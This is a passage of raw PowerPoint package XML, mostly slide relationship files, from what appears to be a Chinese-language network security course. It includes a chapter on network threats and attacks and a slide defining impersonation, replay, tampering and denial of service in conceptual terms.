Target="../embeddings/oleObject40.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48.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject47.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject46.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide75.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing12.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71.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject53.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject45.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject52.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject51.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject50.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject49.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1.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57.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject56.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject55.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide76.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing13.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74.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject62.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject54.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject61.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject60.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject59.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject58.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2.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66.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject65.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject64.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide77.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing14.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77.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject71.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject63.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject70.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject69.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject68.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject67.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3.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75.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject74.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject73.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide78.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing15.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77.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject80.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject72.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject79.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject78.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject77.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject76.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4.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84.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.wmf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject83.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject82.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide79.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing16.vml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.wmf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject89.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject81.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.wmf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject88.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.wmf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject87.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject86.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject85.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.wmf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.w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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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4.xml"/><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81.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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide149.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4.xml"/><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87.wm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vmlDrawing" Target="../drawings/vmlDrawing17.vml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject91.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject90.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.wmf"/><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oleObject" Target="../embeddings/oleObject95.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject94.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject93.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide98.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing18.vml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject92.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.wmf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject99.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject98.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject97.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject96.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide99.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing19.vml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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6.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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6.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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4.vml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.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18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hyperlink" Target="http://www.example.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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38.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38.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38.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide187.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15.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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38.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6.jpe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image" Target="../media/image3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2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.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w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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.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115.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217.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9.jpeg"/><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image" Target="../media/image116.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1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.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image" Target="../media/image122.jpe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wmf"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide144.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oleObject" Target="../embeddings/oleObject102.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject101.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject100.bin"/></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emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.wmf"/></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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide147.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><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slides/_rels/slide263.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18.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject9.bin"/><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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing6.vml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.wmf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.wmf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject13.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.wmf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject12.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.wmf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject6.bin"/></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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide160.xml"/><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oleObject" Target="../embeddings/oleObject103.bin"/></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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1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oleObject" Target="../embeddings/oleObject105.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject104.bin"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide163.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing23.vml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject106.bin"/></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6.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject18.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject17.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject16.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing7.vml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.wmf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.wmf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject23.bin"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.wmf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject22.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.wmf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject21.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.wmf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject20.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/></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image" Target="../media/image39.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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject27.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject26.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject25.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject24.bin"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.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oleObject" Target="../embeddings/oleObject31.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject30.bin"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject29.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.wmf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject28.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zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二章</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="副标题 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络威胁、攻击与网络协议安全性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8777288" y="6408738"/>
            <a:ext cx="366712" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C7D7243-14D9-4810-858E-7BA307A26B3A}"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据流、或产生虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>流。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常分为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>假冒：一个实体假装为一个不同的实体。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：被动获取一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个数据单元，然后重传，以产生一个未授权的效果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>篡改：一个合法消息的某些部分被改变，或消息被延迟或改变顺序，以产生一个未授权的效果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拒绝服务：防止或禁止通信设施的正常使用或管理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特点：能够检测出来，不易有效防止。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
